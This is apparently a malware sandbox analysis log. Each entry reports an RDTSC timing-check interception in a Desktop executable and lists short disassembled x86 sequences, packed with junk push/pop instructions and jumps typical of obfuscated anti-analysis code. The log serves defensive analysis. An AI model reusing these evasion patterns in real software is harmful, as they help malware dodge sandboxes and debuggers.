Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5C26 second address: 10B5CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 719D49D8h 0x0000000d movsx esi, si 0x00000010 push 00000003h 0x00000012 jmp 00007FE66CCE605Fh 0x00000017 push 00000000h 0x00000019 mov esi, dword ptr [ebp+122D2D88h] 0x0000001f push 00000003h 0x00000021 xor dword ptr [ebp+122D2588h], esi 0x00000027 push 6EF44068h 0x0000002c push edi 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 pop edi 0x00000034 add dword ptr [esp], 510BBF98h 0x0000003b call 00007FE66CCE605Eh 0x00000040 add dword ptr [ebp+122D3356h], esi 0x00000046 pop edx 0x00000047 movsx edi, si 0x0000004a lea ebx, dword ptr [ebp+1244AADFh] 0x00000050 mov esi, edx 0x00000052 xchg eax, ebx 0x00000053 jmp 00007FE66CCE6068h 0x00000058 push eax 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jne 00007FE66CCE6056h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5CAE second address: 10B5CBD instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5D67 second address: 10B5D6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5D6B second address: 10B5D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, dword ptr [ebp+122D2C20h] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D2588h], ebx 0x00000016 mov dx, 0A54h 0x0000001a push B2FE7E80h 0x0000001f push ebx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5D8E second address: 10B5DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE66CCE6056h 0x0000000a popad 0x0000000b pop ebx 0x0000000c add dword ptr [esp], 4D018200h 0x00000013 sbb si, 13EEh 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c mov ch, bh 0x0000001e push 00000003h 0x00000020 jmp 00007FE66CCE6062h 0x00000025 push A0B8DDFDh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5DCA second address: 10B5DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5DD0 second address: 10B5DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5DD5 second address: 10B5E23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1F472203h 0x00000010 clc 0x00000011 adc dx, DF86h 0x00000016 lea ebx, dword ptr [ebp+1244AAE8h] 0x0000001c add dx, 6CC7h 0x00000021 mov cx, dx 0x00000024 xchg eax, ebx 0x00000025 jmp 00007FE66CFB4FE6h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e jng 00007FE66CFB4FD6h 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5E8D second address: 10B5F12 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE66CCE6066h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FE66CCE6058h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 movzx edx, di 0x00000029 push 00000000h 0x0000002b mov ecx, 11050399h 0x00000030 call 00007FE66CCE6059h 0x00000035 jmp 00007FE66CCE605Eh 0x0000003a push eax 0x0000003b jmp 00007FE66CCE6063h 0x00000040 mov eax, dword ptr [esp+04h] 0x00000044 pushad 0x00000045 pushad 0x00000046 push esi 0x00000047 pop esi 0x00000048 pushad 0x00000049 popad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e pop esi 0x0000004f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5F12 second address: 10B5F16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5F16 second address: 10B5F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FE66CCE6065h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push edi 0x00000013 pushad 0x00000014 push edi 0x00000015 pop edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5F3E second address: 10B5F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 xor edx, 09CBDAB6h 0x0000000e jmp 00007FE66CFB4FE5h 0x00000013 popad 0x00000014 push 00000003h 0x00000016 mov dword ptr [ebp+122D3489h], ebx 0x0000001c push 00000000h 0x0000001e mov ecx, esi 0x00000020 push 00000003h 0x00000022 mov si, dx 0x00000025 call 00007FE66CFB4FD9h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5F82 second address: 10B5F88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5F88 second address: 10B5F96 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10B5F96 second address: 10B5F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10C851A second address: 10C8524 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5581 second address: 10D55A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6068h 0x00000007 jnp 00007FE66CCE605Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5808 second address: 10D581A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FE66CFB4FDCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5AD8 second address: 10D5ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5ADD second address: 10D5AED instructions: 0x00000000 rdtsc 0x00000002 je 00007FE66CFB4FE2h 0x00000008 jg 00007FE66CFB4FD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5AED second address: 10D5AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5D76 second address: 10D5D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5D81 second address: 10D5D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5D99 second address: 10D5DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5DB9 second address: 10D5DBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5F23 second address: 10D5F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE4h 0x00000009 pop edi 0x0000000a jmp 00007FE66CFB4FE3h 0x0000000f popad 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D5F55 second address: 10D5F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6397 second address: 10D63BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE66CFB4FE5h 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007FE66CFB4FD6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10CAB24 second address: 10CAB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10CAB2D second address: 10CAB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A475C second address: 10A476D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE66CCE6056h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A476D second address: 10A4773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A4773 second address: 10A4777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A4777 second address: 10A477B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6C3B second address: 10D6C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b jl 00007FE66CCE6062h 0x00000011 jno 00007FE66CCE6056h 0x00000017 je 00007FE66CCE6056h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FE66CCE605Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6C69 second address: 10D6C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6C6D second address: 10D6C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6DE6 second address: 10D6DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6F58 second address: 10D6F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6F62 second address: 10D6F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE66CFB4FD6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007FE66CFB4FDEh 0x00000011 jp 00007FE66CFB4FD6h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c jc 00007FE66CFB4FE2h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D6F8F second address: 10D6F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10D73CA second address: 10D73CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBD60 second address: 10DBDC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE66CCE6066h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jp 00007FE66CCE605Eh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007FE66CCE6064h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DA5B4 second address: 10DA5B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DAD65 second address: 10DAD69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBEF3 second address: 10DBEFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBEFD second address: 10DBF2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE66CCE6062h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBF2B second address: 10DBF31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBF31 second address: 10DBF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FE66CCE6056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBF3B second address: 10DBF51 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10DBF51 second address: 10DBF5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FE66CCE6056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10ACD2C second address: 10ACD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FE66CFB4FDCh 0x00000011 jp 00007FE66CFB4FD6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10ACD54 second address: 10ACD77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE66CCE6067h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E27D5 second address: 10E27E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FE66CFB4FDCh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E27E8 second address: 10E27F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E27F0 second address: 10E27F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E27F4 second address: 10E2829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6067h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FE66CCE605Ch 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pushad 0x00000015 jne 00007FE66CCE6056h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E2829 second address: 10E282F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E282F second address: 10E2837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A61A7 second address: 10A61C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE66CFB4FDEh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A61C3 second address: 10A61C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10A61C9 second address: 10A61D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E1E13 second address: 10E1E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E1E17 second address: 10E1E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE66CFB4FE3h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE66CFB4FDFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E1E42 second address: 10E1E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FE66CCE6056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E1F82 second address: 10E1FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FE66CFB4FE9h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E1FA2 second address: 10E1FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FE66CCE605Bh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E1FBA second address: 10E1FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E2654 second address: 10E2658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E2658 second address: 10E2684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FE66CFB4FDBh 0x00000015 jns 00007FE66CFB4FD6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e jo 00007FE66CFB4FF4h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E2684 second address: 10E26A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE6068h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E26A0 second address: 10E26BE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE66CFB4FE7h 0x00000008 jmp 00007FE66CFB4FE1h 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5A0E second address: 10E5A2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6063h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5A2B second address: 10E5A31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5A31 second address: 10E5A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5A36 second address: 10E5A7A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE66CFB4FD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007FE66CFB4FE8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007FE66CFB4FE0h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ecx 0x00000021 pushad 0x00000022 push esi 0x00000023 pop esi 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5A7A second address: 10E5AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 xor esi, dword ptr [ebp+122D2A68h] 0x0000000d call 00007FE66CCE6059h 0x00000012 jmp 00007FE66CCE6064h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jnp 00007FE66CCE6056h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5AB1 second address: 10E5ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FE66CFB4FD6h 0x0000000a rdtsc
